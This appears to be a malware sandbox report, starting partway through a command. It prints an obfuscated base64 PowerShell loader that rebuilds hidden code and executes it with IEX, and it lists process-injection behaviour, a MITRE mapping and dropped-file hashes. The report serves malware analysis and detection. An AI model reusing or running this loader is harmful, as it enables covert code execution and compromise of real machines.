BnAEYAUgBlAGMAcgB1AHIARgB1AHQAdQByAG8AUgBpAHMAZQByAG0ASgBhAHIAZABvAEIATQB5AHQAaABvAGEAWgB5AGcAbwBwAHMARgBvAHIAaABhAGUAQwBvAGwAbAB1ADYATwBmAGYAcwBpADQAUwBrAHIAaQB2AFMASABqAGUAbQBzAHQARgBvAHIAcwB0AHIAQQBuAHQAaAByAGkAUAByAGkAYQBwAG4AQwBhAHQAaABqAGcAVQBuAGkAbgBzACgAQQBmAGsAbABpACQATABhAHMAdABlAEcAQQBtAG0AZQBkAGEASABlAHIAbQBpAGEAQQBuAHQAaQBoAGUARgBvAHIAZQBzACkACgBWAGEAZQBzAGUAWwBQAHIAYQBlAGEAUwBKAGUAdwBzAGYAeQBTAG4AbwB0AHMAcwByAGUAdABzAGsAdABJAG4AdABlAHIAZQBGAG8AcgBpAG4AbQBWAGkAcgBnAGkALgB1AG4AcgBlAHMAUgBtAGkAbgB1AGUAdQBNAGEAcwBvAGMAbgBhAGwAbQBzAGcAdABDAGgAaQBsAGQAaQBVAGQAYgBlAG4AbQBUAGkAdAB1AGwAZQBTAGsAawBlAG4ALgBTAHAAcgBpAG4ASQBCAGoAZQByAGcAbgBDAGEAdABlAGMAdABCAHIAZQB2AGYAZQBTAHQAcgBvAHAAcgBHAHkAdABoAGEAbwBSAGUAZwBhAGkAcABTAGMAbwBsAHkAUwBTAHAAaQBkAHMAZQBWAGUAcwBpAGMAcgBOAG8AbgBhAGwAdgBTAG8AbgBhAHQAaQBTAGUAbABnAGUAYwBNAHkAeABvAG0AZQBWAHIAZABpAHQAcwBCAGEAYgBvAHUALgBUAHUAcgBiAG8ATQBEAGcAbgBwAHIAYQBTAGsAaQBiAHMAcgBSAGEAZABpAGwAcwBGAG8AcgB0AG8AaABQAG8AbAB5AGEAYQBzAGwAdgBsAGEAbABMAGEAbQBiAGwAXQBVAGwAZABnAGEAOgBJAG4AdABlAHIAOgBGAG8AcgBlAGQAQwBNAHkAYwBvAHQAbwBOAHIAcgBlAGoAcABjAG8AcwBtAG8AeQBmAGEAcgB0AGoAKABEAGkAcgBpAGcAJABlAHMAdAB1AG8AVQBTAGUAbQBpAGYAbgBNAHIAawB2AHIAcwBVAG4AaQBnAG4AdABBAG4AdABpAG8AcgBNAGEAcgBrAGQAZQBIAHkAcABuAG8AdwBBAG4AZwBpAHYAZQBGAGkAcwBrAGUALABWAHIAZQBnAHIAIABFAGcAeQBwAHQAMABGAG8AZABmAG8ALABMAHkAZABsAHMAIABEAGUAaQBjAHQAIABwAGwAaQBvAHQAJABUAHUAZQByAG4AVgBCAG8AbwBkAGwAZQBCAGEAZABhAHUAawBWAGUAZABoAGYAcwBCAGUAbAB0AGkAZQBMAGEAYgBlAGwAMwBTAHkAbQBwAGgALABQAGEAcwB0AGkAIABMAGEAbgBrAGkAJABTAGgAaQBwAHAAVQBGAHIAZQBkAGEAbgBCAG4AbgBlAHMAcwBNAGEAdAByAGkAdABTAHUAbABwAGgAcgBEAGkAcwBpAGwAZQBTAGsAbwBkAGQAdwBTAG8AdQByAGUAZQBPAHAAZQBuAHcALgBNAGkAcwBzAHUAYwBFAHMAcAByAGUAbwBYAGUAbgBvAG4AdQBEAGEAYQBuAGUAbgBEAHIAaQBiAGUAdABBAGQAZgByAGQAKQBZAG8AZwBpAGUAOwAKAFMAawBlAG0AcABbAE8AcABnAGEAdgBWAGEAdQBiAGkAbgBlAEYAcgBhAHYAcgBrAEMAeQBzAHQAbwBzAEUAZABpAHQAbwBlAEIAbwB0AGUAdAAxAFAAYQBhAGYAbABdAEIAcgBhAHMAcwA6AFAAZQBhAHQAaQA6AFAAYQByAGEAbQBFAGkAYgBzAGUAbgBuAFMAdAB1AGUAZgB1AGIAYQBjAHQAZQBtAHoAYQByAHIAaQBTAFIAZQB2AGkAZgB5AFIAbwBhAHMAdABzAEEAbgB0AGkAZAB0AEEAZgBsAHUAcgBlAFIAZQBzAHQAbwBtAFIAZQBpAG4AdABMAEQAdQBjAHQAaQBvAEcAYQBhAHIAZABjAE0AdQBzAGkAbABhAGYAZQByAG4AYQBsAEsAbwBsAGwAaQBlAG8AcgBkAG8AYgBzAGUAcABpAHAAaABBAFMAawBlAGUAYgAoAE8AcAB2AGsAawAkAFMAcAB5AGYAbABWAE4AaQBjAG8AdABlAE4AYQB0AHUAcgBrAFAAZQBjAHQAbwBzAEYAbwByAHQAbwBlAFQAdQByAGIAbwAzAFAAYQBhAHQAYQAsAEkAbgB0AGUAcgAgAEQAeQBzAHAAaAAwAGYAYQBjAHUAbAApAE0AYQBuAGcAYQAjAAoAJwBAAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0ANQA7ACAAJABpACAALQBsAHQAIAAkAFMAbAB1AHQAcwBrAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQATwB1AHQAcABsAG8AdABsACAAPQAgACQATwB1AHQAcABsAG8AdABsACAAKwAgACQAUwBsAHUAdABzAGsALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABTAGwAdQB0AHMAawAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABPAHUAdABwAGwAbwB0AGwAIAA9ACAAJABPAHUAdABwAGwAbwB0AGwAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABPAHUAdABwAGwAbwB0AGwADQAKAA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4iws3fac.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1564
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB0AA.tmp"
      4⤵
      PID:1548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4iws3fac.dll

Filesize
3KB

MD5
5de223277731898a41d1ec15e5bf0308

SHA1
e50edddd5279d9671b799fc4d672e9b4e43ff1f8

SHA256
81c25a43b3ae5afe198e83042ad5b1e0d42c8ad957d6eca31c52745043c113be

SHA512
73b989c2788dd908327263aa04872ba0e992ba20a103ca8fb0c9ab39bdaf7362f97e725050d59fadb32d5568a5cfab004ab4c01e85dd4949687151b1c859657d

Download Submit
C:\Users\Admin\AppData\Local\Temp\4iws3fac.pdb

Filesize
7KB

MD5
a70d573092937003807dbe3fbbd4c24a

SHA1
2c250d269bd0091f599fa7ce037dc080871015d7

SHA256
faaba12b7983b7948f9646574cf97e50980209527c3c74feb5da3b722f4af485

SHA512
bfffa4c0da7cef725df66c0eb20781d8ad1e4e4b75e07ad83dac7fc8c94862bb39d2a7c354d117dfaad123d1e0284fd9ab3a22897a2f7b142df6d8795144cc5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB0AB.tmp

Filesize
1KB

MD5
22c19347d9f7fc7ad1b10fedc5c4c5c7

SHA1
d05d55760fb172af636205d25b471921d8765c06

SHA256
a20882daa8d02bfc67b6d7a57a9e1b75956a90db338fb59fbc5c4785cd2a6f2e

SHA512
8bb0b3eb32fcebc83f496cb2dcfb61aaca3dda7d1715bdf5ada71799d2cec54336102f3268ca3a8d48bfde4537e99d99dcbb77fd5f8378f5ddf096dcab92d195

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4iws3fac.0.cs

Filesize
748B

MD5
a088576e8fb6daf9c28647f377415d66

SHA1
09534c5153f4e305fa08b5752773e1cf240953c7

SHA256
5fe10519d31c67bd1b76e5f7a9991e6d554ac96319e126075e41205cec432b23

SHA512
9b275a50755219e3d974ade3086a96e8cbdc297905a947a0975a9e0c7081f348bf292b1dd4f3d952c406b3f9a75318b64d99f7dc237e705de3179168aa205758

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4iws3fac.cmdline

Filesize
309B

MD5
6a74d78e8127cf8aa8d059e1e654401b

SHA1
9295fefb0fc228af318737dfd609c71da2241780

SHA256
8b070c8d2fa7f5dfd2bf31000b9a0ac696b9f83f80c5420d00fafdd6f46976f9

SHA512
bb04f44b2d8d5f13c1842e440dc580dd2376eb694b1333c765fcaaf21a5be0901989cadff756e686bb91d51f196ea0c71f751672f850849f3aa9791ff0145e29

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB0AA.tmp

Filesize
652B

MD5
c721fa4d28bad423996ac46236ec682d

SHA1
8868eb0bfcd31ec8f0378a472bc94270aac18804

SHA256
99638f72dafa7313327fdc049092607ed07bc2b3219b22b6cce543c442467670

SHA512
f16521e290502593fec5d16f142fdb9f27ccfd1b29cf191eb1319207d38228d1c32b30ac3b69f18ea6593cbc4786780aa3d8fb479c4969013d9f89d83c8cbcde

Download Submit
memory/956-57-0x0000000074450000-0x00000000749FB000-memory.dmp

Filesize
5.7MB

Download
memory/956-56-0x0000000075F81000-0x0000000075F83000-memory.dmp

Filesize
8KB

Download
memory/956-66-0x0000000005000000-0x0000000005100000-memory.dmp

Filesize
1024KB

Download
memory/956-67-0x0000000074450000-0x00000000749FB000-memory.dmp

Filesize
5.7MB

Download
memory/956-68-0x0000000005000000-0x0000000005100000-memory.dmp

Filesize
1024KB

Download
memory/2044-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing